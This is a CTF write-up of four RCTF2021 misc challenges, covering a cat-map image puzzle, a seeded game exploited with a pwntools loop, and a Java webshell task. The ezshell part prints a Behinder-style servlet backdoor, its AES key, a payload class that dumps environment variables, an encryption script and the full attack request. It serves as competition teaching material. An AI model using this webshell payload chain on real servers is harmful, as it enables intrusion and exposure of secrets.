RCTF2021 MISC ALL WriteUp-魔法少女雪殇

misc？all stack！

welcome_to_rctf

just go ROIS

CheckIn

little wired，when you post issuse, then actions will work

you can see,your issues, is on there.the flag always ***,

This means that when I enter the correct five-digit number, it will be replaced with ***, and then just find someone else’s actions.

i find it

the flag is 52079,solved!

coolcat

open the link,i saw，visit/getImage

wow,cool pic

in /upload,i upload a pic then i get wired pic

So let’s take a look at the code

 def ACM(img, p, q, m):
    counter = 0

    if img.mode == "P":
        img = img.convert("RGB")

    assert img.size[0] == img.size[1]

    while counter < m:
        dim = width, height = img.size

        with Image.new(img.mode, dim) as canvas:
            for x in range(width):
                for y in range(height):
                    nx = (x + y * p) % width
                    ny = (x * q + y * (p * q + 1)) % height

                    canvas.putpixel((nx, ny), img.getpixel((x, y)))

        img = canvas
        counter += 1

    return canvas

# My image was encrypted by ACM ,  but I lost the p ,q  and m ......

I dont know about p and q and m,but i can confirm，the m is random.

So, I made a special picture to certify my idea,The /getImage pic size is 600×600,so do i.

from PIL import Image

with Image.new('RGB',(600,600),(0,0,0)) as pic:
    pic.putpixel((0,1),(255,255,255))
    pic.save('C:/Users/Snowywar/Desktop/e99aa4e9b7fc4ed5a74a590a63b131e6/1.jpg')
    pic.show()

i got this pic,

upload,then I got a variety of different results. Since the number of m is random, then there must be a situation where m=1, and the values of p and q can be directly calculated. And I conducted a test. m (the number of runs), more run then points obtained will be farther away from the original points.

After many tests, I got the closest point

use photoshop，i got this coordinate,(66,66)

But I still need /getImage when m=1, and continue to test many times.

finally，I got this one

using my py, i can get flag.

from PIL import Image

img = Image.open('./tes1.jpg')

if img.mode == "P":
        img = img.convert("RGB")

assert img.size[0] == img.size[1]

dim = width, height = img.size
p= 66
q= 66


with Image.new(img.mode, dim) as canvas:
    for nx in range(width):
        for ny in range(height):
            y = (ny-nx*q)%600
            x = (nx-y*p)%height

            canvas.putpixel((x, y), img.getpixel((nx, ny)))

canvas.show()

It is wasnt rabbit?

Monopoly

a game,need 10 million win the game.

The game of luck does not even require reverse analysis of the program.

When you choose hard mode, it will let you enter seed, which determines your next steps and behavior

When I was playing here again, I found that press 4 to return to the difficulty selection, and then press 3 to return to the difficulty mode. He will let you enter a new seed, but the amount of money remains the same. Maybe this is a bug.

At the same time, the number of steps in the first step of different seeds is also fixed, indicating that it is pseudo-random.

this is my seed and test.

I found that when the seed is 22, the amount of money will be triggered to double, and I wrote a looping script to get the flag

from pwn import *
import re
import time

p=remote("123.60.25.24",20031)

context.log_level="debug"
p.recvuntil('your name?\n')
p.sendline('haha')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
for i in range(999999):
    #money = p.recvline('your money')
    
    #if p.recvuntil('RCTF'):
     #   print(p.recvuntil('RCTF'))
    p.recvuntil('want play\n')
    p.sendline('4')
    p.recvuntil('want play\n')
    p.sendline('3')
    p.recvuntil('win the game!\n')
    p.sendline('22')
    p.recvuntil('want play\n')
    p.sendline('4')
    p.recvuntil('want play\n')
    p.sendline('3')
    p.recvuntil('win the game!\n')
    p.sendline('22')

ezshell

Is really misc? I dont think so.

Download the war package

protected void service(HttpServletRequest request, HttpServletResponse response) {
        try {
            String k;
            if (request.getMethod().equals("POST")) {
                response.getWriter().write("post");
                k = "e45e329feb5d925b";
                HttpSession session = request.getSession(); //Generate session, the next line is also
                session.putValue("u", k);
                Cipher c = Cipher.getInstance("AES");
                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
                byte[] evilClassBytes = (new BASE64Decoder()).decodeBuffer(request.getReader().readLine()); //Read the content of the post request package
                class U extends ClassLoader { //Override the class loader so that it can load any malicious class                    U(ClassLoader c) {
                        super(c);
                    }
                    public Class g(byte[] b) {
                        return super.defineClass(b, 0, b.length);
                    }
                }
                Class evilClass = (new U(this.getClass().getClassLoader())).g(c.doFinal(evilClassBytes)); //Decrypt the post data packet basedecode and then AES
                Object a = evilClass.newInstance();
                Method b = evilClass.getMethod("e", Object.class, Object.class); 
                b.invoke(a, request, response); 
            } else {
                //download war
        } catch (Exception var10) {
    }
}

so，Write a malicious class and let him call it

payload.java

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.util.*;

public class payload{
    public void e(Object req, Object res) throws IOException, InterruptedException {

        HttpServletRequest req1 = (HttpServletRequest)req;
        HttpServletResponse res1 = (HttpServletResponse)res;
        StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
        Map<String, String> env = System.getenv();
        Iterator var7 = env.keySet().iterator();

        while(var7.hasNext()) {
            String name = (String)var7.next();
            basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
        }

        basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
        Properties props = System.getProperties();
        Set<Map.Entry<Object, Object>> entrySet = props.entrySet();
        Iterator var9 = entrySet.iterator();

        while(var9.hasNext()) {
            Map.Entry<Object, Object> entry = (Map.Entry)var9.next();
            basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
        }

        String currentPath = (new File("")).getAbsolutePath();
        String driveList = "";
        File[] roots = File.listRoots();
        File[] var14 = roots;
        int var13 = roots.length;

        for(int var12 = 0; var12 < var13; ++var12) {
            File f = var14[var12];
            driveList = driveList + f.getPath() + ";";
        }

        String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
        Map<String, String> entity = new HashMap();
        res1.getWriter().write(basicInfo.toString()+"<br>");
        res1.getWriter().write(currentPath+"<br>");
        res1.getWriter().write(driveList+"<br>");
        res1.getWriter().write(osInfo+"<br>");
    }
}

But its not work.I saw the hint.

i know.

BehinderV2.0 unpack it to locate the equals function

public boolean equals(Object obj) {
        PageContext page = (PageContext)obj;
        page.getResponse().setCharacterEncoding("UTF-8");
        String result = "";

        try {
            StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
            Map<String, String> env = System.getenv();
            Iterator var7 = env.keySet().iterator();

            while(var7.hasNext()) {
                String name = (String)var7.next();
                basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
            }

            basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
            Properties props = System.getProperties();
            Set<Entry<Object, Object>> entrySet = props.entrySet();
            Iterator var9 = entrySet.iterator();

            while(var9.hasNext()) {
                Entry<Object, Object> entry = (Entry)var9.next();
                basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
            }

            String currentPath = (new File("")).getAbsolutePath();
            String driveList = "";
            File[] roots = File.listRoots();
            File[] var14 = roots;
            int var13 = roots.length;

            for(int var12 = 0; var12 < var13; ++var12) {
                File f = var14[var12];
                driveList = driveList + f.getPath() + ";";
            }

            String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
            Map<String, String> entity = new HashMap();
            entity.put("basicInfo", basicInfo.toString());
            entity.put("currentPath", currentPath);
            entity.put("driveList", driveList);
            entity.put("osInfo", osInfo);
            result = this.buildJson(entity, true);
            String key = page.getSession().getAttribute("u").toString();
            ServletOutputStream so = page.getResponse().getOutputStream();
            so.write(Encrypt(result.getBytes(), key));
            so.flush();
            so.close();
            page.getOut().clear();
        } catch (Exception var15) {
            var15.printStackTrace();
        }

        return true;
    }

Isn’t this just outputting environment variables?

Generate base64 payload data

exp

import com.sun.xml.internal.messaging.saaj.util.Base64;
import org.junit.jupiter.api.Test;
import sun.misc.BASE64Decoder;
import sun.misc.BASE64Encoder;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.Enumeration;

public class test1 extends HttpServlet {
    @Test
    public void test() throws IOException, NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException {
        String k = "e45e329feb5d925b";
        Cipher c = Cipher.getInstance("AES");
        c.init(1, new SecretKeySpec(k.getBytes(), "AES"));
        FileInputStream fileInputStream = new FileInputStream(new File("payload.class"));
        int n = 0 ;
        //i dont know how to wirte auto length,so I measured it manually
        byte[] buffer = new byte[3525];
        n = fileInputStream.read(buffer);
        System.out.println(n);
        System.out.println(Arrays.toString(buffer));
        byte[] bytes = c.doFinal(buffer);
        System.out.println(Arrays.toString(bytes));
        String s = (new BASE64Encoder()).encodeBuffer(bytes);
        System.out.println(s);
    }
}

Note that the bytes length must be accurate

POST

POST /shell HTTP/1.1
Host: 124.70.137.88:60080
Content-Length: 4716
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://124.70.137.88:60080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://124.70.137.88:60080/shell
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-CN;q=0.7,zh;q=0.6
Cookie: JSESSIONID=EDF504EDA8DBEE209AEC526FCAADD8DC
Connection: close

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

back

...
<br/>
TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download&filename=tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc  https://www-us.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc  https://www.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc     https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc
<br/>
ffl4444gg=RCTF{e2zzzz5h333ll_sooo_ez}
<br/>
JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre
<br/>
...

文章版权归作者所有，未经允许请勿转载。

THE END